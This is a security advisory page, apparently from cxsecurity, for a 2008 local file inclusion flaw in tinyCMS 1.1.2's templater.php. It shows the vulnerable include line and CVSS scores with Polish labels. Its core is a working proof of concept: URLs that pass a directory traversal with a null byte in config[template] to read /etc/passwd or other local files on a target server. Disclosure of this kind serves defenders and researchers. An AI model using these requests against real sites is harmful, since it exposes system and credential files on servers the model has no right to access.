tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability

2008-10-27 / 2008-10-28
Credit: cOndemned
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 5.1/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 4.9/10
Wymagany dostęp: Zdalny
Złożoność ataku: Wysoka
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

&#239;&#187;&#191;######################################################################################## # # Name : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability # Author : cOndemned [ Dark-Coders ] # Greetz : Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z # Conditions : Magic quotes gpc = Off / Register Globals = On # Other info : Prior versions probably are vulnerable too # ######################################################################################## Source of /modules/ZZ_Templater/templater.php [ ... ] 17. $ftemplatedir = 'templates/'.$config['template'].'/'; 18. include('templates/'.$config['template'].'/data.php'); // <--- LFI 19. if($tdata['useblocks'] == 1) [ ... ] Proof of Concept : http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00 http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00 Jusf 4 fun

Referencje:

http://1scripts.net/php-scripts/index.php?p=6


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top